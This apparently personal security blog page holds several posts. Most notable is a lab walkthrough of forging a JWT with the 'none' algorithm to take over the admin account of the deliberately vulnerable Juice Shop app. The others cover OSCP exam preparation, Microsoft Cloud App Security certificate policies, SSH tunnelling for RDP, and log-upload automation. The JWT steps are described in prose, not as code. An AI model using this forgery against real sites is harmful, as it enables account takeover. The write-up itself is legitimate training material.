Practicing JWT Attacks Against Juice-Shop

I love attending the sessions put on by Black Hills Information Security when I can. Last week, the session was on JWT token attacks which I found very interesting. I wanted to see if I could mimic part of the demonstrated attack, reproduce and then leverage that attack into elevated access on a site. The BHIS session for JWT attacks on the day of 6/18/2020 can be found here: https://www.youtube.com/watch?v=muYmiEtPL8U&t=2490s

For this lab, I downloaded Juice Shop which is intentionally vulnerable to many of the top OWASP attacks. Once I had the app up and running, I explored the app some to enumerate users. In the session we didn’t get to see where the admin user was exposed – turns out this was super easy to find. After poking around in the site I decided to try and attack a password change for the admin account to see if I could muster a complete account takeover.

Step 1: Install Juice-Shop

I already had an Ubuntu 18.04 LTS machine running in the lab, so I just wanted to add the app here. I tried the NodeJS and NPM route first, but I ran into some snags and I did not want to invest a ton of time troubleshooting. I decided to go the Docker route and I was able to get this working on the first try.

Juice-Shop: https://github.com/bkimminich/juice-shop#docker-container

Docker installation directions: https://docs.docker.com/engine/install/ubuntu/

I followed the documented steps verbatim:

And I was able to browse the site:

 

Step 2: Recon

There is a ton to explore on this site. For the purposes of this post, the only necessary recon is to open the Apple Juice product, look at the product review and note the username of the person that left the review:


admin@juice-sh.op seems like a “juicy” target (pun intended).

Ok, now onto trying to exploit a JWT token vulnerability…

Step 3: Identify Where/What to Attack

    1. I need an account. If I have an account, I can look at how the JWT tokens are constructed and then I can use that to try and craft a new token as my victim user. I went to login – created a new account named hack@hack.com w/ a password of P@ssw0rd!

    2. I then logged in with the newly created credentials:

    3. I took a look at all of the traffic in the Burp proxy log and notice calls to the /rest/user/whoami endpoint with my JWT token:

    4. The tokens are the same in the Authorization header as well as in the cookie. I chose the bottom /rest/user/whoami GET and Send to Repeater
    5. Now I need to learn if I need to attack the Authorization Bearer token, the token in the cookie or both
      1. I added a letter to auth header (basically break it) – no change on send
      2. I added a letter to the cookie and it breaks – this is the one that matters

Before:

After:

Step 4: Craft the JWT Attack Token

  1. This is a signed JWT token – I can tell because it’s <base64URLencoded-header>.< base64URLencoded -payload>.< base64URLencoded -signature> – 3 base64urlencoded strings separated by periods:

  2. I copied the header into Decoder, decode as Base64, change “RS265” to “None” and then encode as base64. The new string is my new header. I paste this into a document off to the side for later use

     

    ** NOTE – the “=” sign will break the header. These need to dropped when copying and pasting!

  3. Next, I grabbed the payload and dropped that into Decoder, modified the email address and then reencoded as base64:

    And change it to this and then encode it as base64

  4. I copied the new payload and then pasted the new header and payload into repeater. Drop the signature (since we now have “none” in the header) and hit send:

    No luck – this is where I had to play with the headers a bit to get this to consistently work. In order to get the return I wanted I ended up removing headers until I got the result.

    Modified request (missing some headers – most notably the bearer token):

    Result:

Success! With that, I doubt that the id of the admin user is 18 (this is the id for my hack@hack.com account I created). Most likely, admin is going to be an id of 1 so I changed that in the token, encode and resend. Result:

Step 5: JWT Attack

  1. I now have a JWT token that is accept by the /rest/user/whoami API. With that, I need to see if other parts of the application will accept the token and chose to attack the password change functionality. I went into password reset on my account to change the password:

    And change the password to “password1”:

  2. Looking at this traffic in Burp:

  3. I simply take and replace the Authorization token with the newly crafted JWT and replace the entire cookie in this new request from the previous Repeater request:

    I get a 200 back and the password is shown there within the returned payload. Turns out this is the MD5 of the password I did in fact just set. Now, can I login with the creds?

  4. Success!

I was able to change the password for the admin@juice-sh.op account and log into the app with the new credentials!

Key takeaways:

  1. Base64url encoding for the headers
    1. Drop the trailing “=” or the header will break
  2. Play with the headers until you get a result you like

Good stuff!

Security, Web Attacks

OSCP – My Beginning, My Fall, My Rise and My Resources – Just Like Batman

I officially got notice today (5/26/2020) that I passed my OSCP exam. I am going to keep this light with a focus on study resources as there are many and better writeups on how to tackle the OSCP. It took me about a year and two test attempts, but I finally made it. This was the hardest singular exam I have ever taken as the breadth of knowledge required and my starting point made this quite a significant task. My boss provided the funds for me to purchase the course materials last summer (2019 – thanks Tavis!) and I studied/focused on the book material right out the gate…huge mistake. I let my lab time expire and barely touched it. At the time of expiration, I had popped a single low privilege shell using SQLMap (not even allowed on the test) and had 0 additional success prior to lab expiration. I knew I was no where near being ready, so I turned to forums and found folks were prepping by working with machines from Vulnhub and Hack The Box. Prior to my first attempt at the test (Feb 2020) I did purchase 15 days of lab time to see what I could do, and I had quite a bit of success. I attempted and failed the test in Feb 2020 due to time management – shocker! This is a common reason folks post for failing and I now wholly understand why. In April of 2020 I attempted a second time with a different strategy and came out on top!

Resources

I took a lot of guidance from this post: https://forum.hackthebox.eu/discussion/1730/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt

Here were the materials I really used to prep for the exam

    1. Read the book
    2. Attacked the lab (especially with the second block of time)
    3. Watched the videos – sort of
      1. Probably could have gotten more value here
    1. As many of the solved easy-medium ones as I could
      1. Requires the VIP subscription but this is like $120/year
  1. VulnHub – OSCP-Like
    1. https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms
  2. Buffer Overflow Practice
    1. https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
    1. Watched all CTF Windows Easy
    2. Watched most CTF Windows Medium
    1. These are amazing!!!

My Study Strategy

I really took to heart the blog post from LRNZO above and followed the guidance. For some reason, it really resonated with me on reading, so I settled on that for my strategy. I dove in and heftily focused on OSCP like machines across HTB and VulnHub. I spent very little time using or learning Metasploit – just the basic commands needed to attempt and exploit or to use the multi-handler. My intention was to conquer all of the machines without Metasploit or at least attempt them without having to use it. In retrospect, I think I should have spent a little more time here and learned the tooling better as I do think one of the test machines I ran into specifically was potentially meant to be cracked with MS and I didn’t end up getting that one. I really got the most value from the retired HTB machines and the writeups. I would attempt these machines myself and then read the writeups post to see if there were things I could have done differently. It is always pretty humbling to see how bad you struggle doing something and then watch something like an IPPSec video on it and he would show you 3-4 different ways to accomplish. The best/craziest part about learning all of this really comes down to the Einstein quote – “The more I learn, the more I realize how much I don’t know”….so very true. Here are where Rana Khalil’s writeups were awesome as well – I loved her approach on recon and how concise her writeups were.

Key element for sure – focus on the basics and recon, recon and then recon some more. Enumerate. Find the nooks and crannies until something presents itself. I cannot tell you how many machines I have solved now when I have given up all hope (almost) and then tried just one more thing…and then the lid blows off. This even happened during the test. I am coming to find that mindset is key and mental endurance (especially during the test) is a necessity.

Time Management

Test Take #1: Wow did I fail on this the first time around. I read a lot of blog posts on how to tackle the test. I decided to go with the early morning start – get the test rolling as I would my normal work day, hit the BOF right out the gate, plan to have 60-65 pts by dinner, take a break to hang with the family, crack the rest of the machines by midnight and get a good night’s sleep with a score of 100 – heh, that didn’t happen. Rather, I hit a snag with the BOF, spent around for 2-3 extra hours flummoxed there (something silly) started reconning the other machines late, ended up in a mental tailspin and completely defeated myself by late eve. I think I may still have only had the BOF (25 pts) at midnight and that was largely due to my approach, my frustration and my deviation from the game plan. I kept looking for the quick easy win rather than working the recon and making sure I was not missing something. I had a printed-out playbook on what to do and how to recon based on service enumeration which went completely out the window as I sought homerun after homerun. You have to go into the test with a game plan and STICK TO IT. In the wee hours of the morning, I was exhausted and mentally defeated. If I would have submitted the report, I think I would have been around 55 pts when the clock ran out.

Test Take #2: The approach on this attempt was way different. First, a lot of the blog posts suggest doing to the BOF right out the gate and getting it out of the way – I say nay to that. Rather, make sure you are comfortable as you can be with them and do the BOF when your brain is fried. That is why you practice anything – so you develop the muscle memory and you can execute it in your sleep. I took the opposite approach as to when to start this time as well – rather than starting with my normal day and then spending my exhausted time in front of the keyboard when it was dark outside and I am normally asleep, I started my test at 6PM so that I would spend my truly exhausted time during the day when the sun was out and I would normally be working. 6AM came around the next morning, I was still chugging, I put on a pot of coffee and I pulled a true all-nighter never actually having my head hit the pillow during the test. I only ended up with 70pts (I was oh so close on another machine right as the clock ticked off) but the point is that I was actually still going strong(ish) at the end.

For this, you have to do what you think will be right for you, however, for me it came down to figuring out how I was going to be able to stay positive enough to defeat Debbie Downer when she came knocking. Fatigue is a mighty foe and not to be trifled with.

Advice

I’ve been hit up a few times now on folks looking to start their OSCP/Pentesting/Cybersecurity journey asking me how to get started. I would say that the OSCP is maybe not so much where to start your cybersecurity trek, however, if you are looking to specifically to get started with pentesting and learning this tooling then the most important thing to understand is that it is totally OK to fail…but not too fast. You need to feel the pain. Don’t hit the walkthroughs, blogs or forums too fast when working a machine, but don’t wait forever either. Make sure you are truly stuck and then go and get the answer you need to move onto the next step. The whole “Try Harder” crud is garbage (IMO) – smashing your face into the same wall over and over does not teach you anything. Do your best to make sure you are truly at a dead stop and then go get the answer you need to move to the next step. Make sure you understand what it took to overcome that block and tuck it away in your utility belt for next time (aka learning) – this is especially true early on. If you could already solve all of these machines and you had infinite time then “Try Harder” might apply, however, thinking back to math in HS and college there was a reason the odd numbered questions had their answers in the back of the book….

Additional Resources

These are ones I just want to call out as coming in very handy in prep for the test. There is so much to learn and so many resources out there that provide invaluable insight and capabilities it would prove impossible to list them all. The most important resource is most likely your favorite search engine.

Pentestmonkey Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Nishang: https://github.com/samratashok/nishang

Crackstation: https://crackstation.net/

GTFOBins: https://gtfobins.github.io/

Footnote

I do have to add a special footnote here and say thanks to my wife. She watched the kids while I studied and had to tackle them fully on her own the full day of the test. With a 3 and 7-year-old at home, no small feat and this was in the midst of shelter at home. Thanks Erin!

OffSec, OSCP, Security

MCAS – Device Identity via Certificates and Progressive Web Apps

I have a customer scenario where we needed to explore leveraging certificates in order to identify corporate Windows 10 machines for the purposes of preventing corporate data from being downloaded from O365 services to non-corporate assets. There are a few different ways that this can be tackled, however, other routes proved to be dead ends for various technical reasons, so it was landed on leveraging device certificates via MCAS in order to control data spillage.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#managed-device-identification

Utilizing device identity via MCAS with certificates does mean that your user traffic for the devices with certs (and without) will have to go through Conditional Access App Control for all the sessions (reverse proxy). It took some trial and error to get this to work. I do want to point out that this method is technically not supported for O365 services as proxying traffic for O365 can impact the user experience and impact the SLAs.

Scenario

  1. Hybrid Azure AD Joined machines will be allowed to access corporate resources unfettered
  2. Corporate devices without HAADJ will have a certificate deployed to them. The certificate will be used in a session control policy via MCAS to allow the device to download corporate data from O365
  3. Devices without certificates (corporate or otherwise) will be treated as untrusted. They will still be allowed to access corporate data (as allowed by other conditional access policies outside of the scope of this blog) but they will not be allowed to download data from O365

Hybrid Azure AD Join: https://docs.microsoft.com/en-us/azure/active-directory/devices/hybrid-azuread-join-managed-domains

HAADJ is a function of AAD and AAD Connect where machines are effectively synced from your on-prem AD into AAD. If a device has been synced, that information can be leveraged within conditional access policies as a piece of criteria during authentication. At this point, you can decide to request additional controls (such as MFA), whether to allow or block access, and even potentially drop the session into the MCAS reverse proxy for additional session control. In order to cover these scenarios for my lab, I configured two conditional access policies – the first policy enables the scenario I want to allow and the second policy blocks the rest.

Policy #1 – ITOp5 – RP – Block Download without Cert

My target user is ITOp5 in my lab. This is a standard user account that has been synced from the on-prem AD via AADC.

Apps – I went lazy for this and simply selected all apps

Conditions

Only targeting Windows since this was my client’s use case

Only allowing browser – the reverse proxy only works with the browser. Since that is the case, we are only going to allow browser based access.

For device state, we want to include all devices…

But exclude devices that are actually compliant (this is a 2-fer and how we catch all 3 scenarios with 2 conditional access policies)

In this case, I am only granting access, but additional controls and requirements could be implemented

Lastly, I am putting my user into Conditional Access App Control aka the reverse proxy if the above criteria is met

Policy #2 – ITOp5 – Block Non Browser on Non Compliant Devices

This policy is almost exactly the same with two exceptions. The first exception is Client apps – in the allow policy this is set to Browser. In the block, this is set to everything else

Lastly, rather than grant the policy is set to block

With these CAPs, folks coming in on a Windows machine either need to be marked compliant via Intune or have their devices HAADJ in order to have full access to all resources and to be able to use thick client apps. Everyone else is going to be routed into the reverse proxy. For the proxied users, if they have a certificate, they will be allowed to download data to their endpoint. If they do not have the certificate, the user will be forced to leverage the cloud-based tools within O365 to collaborate and work with corporate data.

MCAS – Session Control Policy

Configuration here is straight forward. It is a Control file download (with DLP) policy. For the criteria, it is going to specifically target my test user and block if the user does not have the certificate. Given that, the criteria is going to be targeted to the devices that do not have a valid certificate

For the file criteria I could get specific and try to stop content specifically with PII, financial data, HIPAA, etc. but I really want to stop all egress in order to prevent non corporate devices from coming under potential eDiscovery. With that, the criteria for what I am looking for is left blank to catch all content

Lastly, the policy is set to block with a custom block message. Notifications are optional

This is it! Other than getting certificates to the end points a HAADJ joined machine should be allowed to connect regardless of app. An unmanaged device should be routed into the reverse proxy and data egress should be blocked.

Verified this was the case in lab with this configuration and I have the behavior I want.

Device Certificate

For the root cert that goes into MCAS, it just needs to be the base64 encoded public cert (.CER) file that you import. Simply export, import and done.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#client-certificate-authenticated-devices

The device identification mechanism can request authentication from relevant devices using client certificates. You can either use existing client certificates already deployed in your organization or roll out new client certificates to managed devices. You then use the presence of those certificates to set access and session policies.

Not a ton of detail – this suggests that a device certificate on the endpoint should be sufficient. There is a little more detail further in the article that suggests an SSL certificate. From my testing, I have found that the ultimate requirement for this certificate itself is that it has Client Authentication in the Extended Key Usage. Lastly, the certificate needs to be installed into the user’s personal store – the local machine store will not work.

Walking through the process using a MS PKI to deploy the cert – this is probably not the most efficient and is definitely not the route you would go to deploy certificates in bulk to end users. This is purely the process I used and I wanted to document it here to show how I get a cert manually into the end user store.

Certificate Authority Template

I duplicated the Web Server Template, added Server and Client Authentication in for Extended Key Usage. I then published the template for use within in CA.

End User Certificate Request

I am doing this manually with a certificate signing request. On the endpoint, create a request.ini with the following and run the certreq command

I took the output in the csr6.req file and pasted it into the CertSrv site requesting a certificate utilizing the custom Web Server template I created with Client and Server authentication in the EKU

I downloaded the .cer file, copied it to the target workstation and than ran the following to import the cert directly into the user’s personal store

At this point, we can validate that the browser is able to see the certificate by going into Settings -> Search for Certificates

I can also see the certificate if I go into the certificate manager and look in the user’s personal store

Now, when I browse to O365 I hit the login page, I provide my username and then password. Immediately post password, I get the following

I select my certificate and hit ok. This allows me into O365. At this point, I can browse anywhere in the cloud service and download files since I now have a valid certificate that I presented immediately post authentication to the reverse proxy. Given how the conditional access policies are configured, this prevents all non browser apps from accessing the services. This means that only machines that are HAADJ or Intune managed (and compliant) are allowed to use thick client applications. Machines outside of that are allowed to access O365 but are not allowed to download content unless they have the certificate. Even the machines with the certificate are forced into use the web apps for O365 as applications like Outlook, Teams, OneDrive sync, etc. are not allowed to connect directly to the service. These users with the cert would be able to download content directly to their machine and work on it offline but they would then have to re-upload the content via the browser when it came time.

Progressive Web Apps

PWAs introduce and interesting option for enabling productivity but still flowing the traffic through and controlling data egress via the reverse proxy. This is very slick and I use PWAs for sites/apps both for O365 and otherwise.

https://docs.microsoft.com/en-us/microsoft-edge/progressive-web-apps-edgehtml/get-started

That’s the dev resource for PWAs so what does this actually mean for O365? You can pin specific sites (like Outlook and Teams) as PWAs on a machine. They are still web apps, but they get better performance, they get extra caching and they all the nice little tweaks to make them _almost_ as good as the thick client. Keep in mind, the _almost_ is my opinion and it does depend on the app. For example, I use a music stream service on home machine. The app for the stream service is a resource hog. I pin the PWA for that app and it is significantly lighter on resources on my machine. I think each web app (both in and out of the MS ecosystem) warrants exploring.

Edge Chromium

Summary

Requirements for leveraging Device Certificate via MCAS to block downloads of corporate data to unmanaged devices

Device Certificate Requirement

  • Certificate has Client Authentication in the Extended Key Usage
  • Certificate is located in the user’s personal store

Conditional Access

  • Non browser apps are blocked for the targeted users – required or the session will not be routed into the reverse proxy and this negates the usage of the certificate in order to allow/block downloads
  • Browser access is set to be granted through Conditional Access App Control

MCAS Session Control Policy

  • Block downloads of all data to devices that are not tagged with having the certificate

Resultant Scenario

  • All users off network and/or in scope would be forced to use web-based clients for a connected experience. This means thick client apps such as Outlook, OneDrive Sync, Teams and even tools like Excel and Word will not work when connecting directly to cloud data
  • All users with a valid certificate would be able to download the data and work with tools like Word and Excel in an offline mode and then reupload the data into SharePoint or OneDrive
  • Progressive Web Apps provide a nice alternative to thick clients and/but they do not allow local disk access
  • End users would still have full access and be able to use the web-based collaboration tools within the cloud without allowing egress of data to their endpoints

Happy MCAS-ing!

Hack Job, MCAS

Secure RDP – Using SSH Tunneling With Built-In Windows Features

So…

Who knew? I didn’t. This is the screen for Settings -> Apps and Features -> Optional Features for both Windows Server 2019 as well as Windows 10. This was a very pleasant surprise. With that, I am always looking for a way to connect to my home lab that is:

  1. Secure
  2. Minimizes the required HW/resource footprint

I was previously using Remote Desktop Services along with Azure App Proxy (here) to publish access securely, however, this meant that I had to have the RDS and AAD App Proxy footprints in my lab. I only have 48GB of RAM in my lab and I run out all the time – running AD along with a few additional services for demo purposes can really put the squeeze on quick. Stumbling across OpenSSH built right in seems like it might be the solution for which I have been looking. With that being said, the documentation….has room for improvement. I did finally find the answers I was looking for and was able to leverage SSH tunneling in order to RDP into my lab. I love this!

** Requires Windows 10 or Server 2019

I am going to save you some time and steer you away from the official docs. The documentation you need to get started is in an answer on Stack Overflow here:

https://stackoverflow.com/questions/16212816/setting-up-openssh-for-windows-using-public-key-authentication and was provided by this person: https://stackoverflow.com/users/31782/n0rd

High level, here are the condensed steps from his answer:

On the server:

  1. PS> Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 or through the UI (pictured above)
  2. Start the services
    1. PS> Start-Service ssh-agent
    2. PS> Start-Service sshd

On the client:

  1. Mkdir .ssh in the C:\Users\<Username>\ directory. This is where the keys are going to land. For demo purposes, I am going to use administrator so the path would be C:\Users\Administrator\.ssh
  2. CD to that directory using CMD or PS
  3. Run ssh-keygen
    1. Give a password or not for the key file. I chose to do so for the sake of security
  4. In the window, run ssh-add .\id_rsa (assuming this is the private key that was generated). You will get prompted for the password – go ahead and enter it. This makes the key securely available without prompted for a password every time you use it to connect from this machine

The client is now configured.

Back to the server:

  1. Log into the server as the user you are wishing to connect as – for demo purposes this is the administrator account
  2. Mkdir C:\Users\<Username>\.ssh – in this case, C:\Users\Administrator\.ssh
  3. Copy and paste the contents of the .pub file from the client into a file named authorized_keys here in this directory on the server
  4. Right Mouse Click on autorized_keys and go to properties
  5. Properties -> Security -> Advanced -> Disable Inheritance
  6. There should be exactly 2 perms assigned to this file (probably has 3 right now).

    Get rid of the extra. You should have SYSTEM and your user account – in this case Administrator. Get rid of any other entries such as Administrators (group) here.

  7. Apply, Ok, Close, or whatevs to save the changes
  8. Open C:\ProgramData\ssh\sshd_config with notepad or your text editor of choice
  9. Comment out the bottom 2 lines

    NOTE: Put a # at the beginning of each line to comment it out

  10. Find this line and make sure it is not commented out:

    PubkeyAuthentication yes

  11. Save and close

At this point, you can SSH in with the key file. Sweet! For my lab, in order to further secure it, I want to make it such that you HAVE to use the keyfile in order to connect.

  1. Reopen sshd_config with notepad
  2. Find this line, uncomment it and set it to no:

    PasswordAuthentication no

  3. Save and close
  4. PS> Restart-Service sshd
    • This may or may not be necessary

Now, you HAVE to use the private key (which exists only on your machine) to SSH to the server. Sweet!

The next step depends on your environment and which port you want to use. For me, I grabbed a random high value port on my router and port fowarded it to 22 on my server. For demo purposes, I used 47474 (which I later changed). Now, on my machine I can either SSH to the Windows Server (which throws a CMD shell by default) or I can fire up tunneling to RDP into any machine in my lab.

Just doing a straight SSH:

Now, to do RDP instead we just need to fire up the tunnel with a slightly different command

Note the -f and the -N along with the 12345:HV01:3389. MyPublicIp is the public IP I currently have for my lab ommitted for security:

-f = for into the background
-N = do not execute a remote command
12345 = the local port to which we are going to RDP
HV01 = the server name to which we want to RDP in the lab
3389 = the port to which we are going to RDP

When you run this command, a listener (:12345) is established on the local machine which is routed through the secure tunnel (:47474 -> :22) to :3389 on HV01

RDPing to my localhost on port 12345 – MSTSC prompts me for creds. I provide valid creds for the HV01 machine in my lab and:

Boom. We now have a secure tunnel that can only be accessed with the private key on my local machine which then allows me to RDP into my lab.

Hack Job, Security, Uncategorized

MCAS Lab – Auto Updating Discovery Data with Sample Data

Maybe you have a need to demo Microsoft Cloud App Security to your customers. Maybe you have a need for a lab that has constantly updated discovery data. Maybe creating a snapshot report every 30 days is good enough…maybe not. For me, I want the Discovery Dashboard to be populated with fresh data for demo purposes and the logs from my home router just don’t cut it as GBs of traffic to NetFlix, and Hulu and a taste of Twitter just don’t make for that compelling of a demo. I wanted a way to auto-update the global logs on a recurring basis in a “set it and forget it” manner.

  1. Deploy the log collector (Ubuntu FTW)
  2. Grab the Code and Config
  3. Create the Scheduled Task
  4. Forget it

#1 Deploy the log collector

https://docs.microsoft.com/en-us/cloud-app-security/discovery-docker-ubuntu

Critical Pieces of information:

  1. Machine Name – UBTLOG01
  2. Machine IP – 192.168.50.163 (this isn’t my real IP but I’ll keep it consistent for the purpose of the doc)
  3. Log Collector Data Source – name I gave the data source in the MCAS portal
  4. Log Collector Data Source Type – Palo Alto – PA Series FW
  5. Data Source Type – FTP

MCAS Portal – Log Collectors

Now that the log collector is deployed, we can move on to the code and the scheduled task

#2 Code and Config

Download from GitHub here
Download the code and drop it into the folder in which you want the script to run from and work.

I like using the CredentialManager module to register to register and hide credentials on my PowerShell automation machines.

PowerShell Gallery: Credential Manager 2.0

On line 44 of the PS1 code it has the path to the .env file (really just JSON) that contains all of the environmental variables necessary to run the script. Here’s the format of the .env file:

{
    “LogCollectorVMName”: “UBTLOG01”,
    “LogCollectorHVHost”: “DC03”,
    “LogCollectorIP”: “192.168.50.163”,
    “LogCollectorDSName”: “PaloFW-TSTLab”,
    “CredManTarget”: “MCAS”,
    “LogfilePath”: “E:/Jobs/MCASLogCollectorUpload”
}
LogCollectorVMName – Name of the Ubuntu machine
LogCollectorHVHost – I am using HyperV to host the log collector machine
LogCollectorIP – IP Address (LAN) for the Ubuntu machine
LogCollectorDSName – Data Source name assigned during the creating in MCAS
CredManTarget – name target used to retrieve the FTP credentials for pushing the log files
LogfilePath – path to really all of the artifacts – since this is a json file, use / instead of \ for the path
  1. Install Credential Manager on your worker machine
  2. Register the ftp credentials in a target named MCAS (match your .env file)
  3. Drop the script and the .env file in the LogFilePath you assigned earlier – I am using a path of E:\Jobs\MCASLogCollectorUpload

#3 Scheduled Task

Import the provided schedule task and tweak to your environment

  1. Fix the user

  2. Tweak the trigger (if wanted)

  3. Set the paths for the Action

    Program Path: %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

    Arguments: full path to the .PS1 file – E:\Jobs\MCASLogCollectorUpload\MCAS_Upload-Log.ps1

    Start in – path to all the files – E:\Jobs\MCASLogCollectorUpload

#4 Forget it

At this point, run the scheduled task to ensure it is working. The PS1 script will even turn the VM on and off on-demand so that you can conserve the VM resources rather than having the Ubuntu machine running 24×7. If you are fast enough, you can FTP to the log collector yourself and see the file land – cd into the folder with the name of the Log Collector Data Source:

Once the file is uploaded, it will disappear from this folder on the FTP server. At that point, check in the governance log within MCAS and you should see this:

Now, your MCAS demo environment will stay fresh with recurring sample data.

Automation, Hack Job, MCAS, PowerShell, Security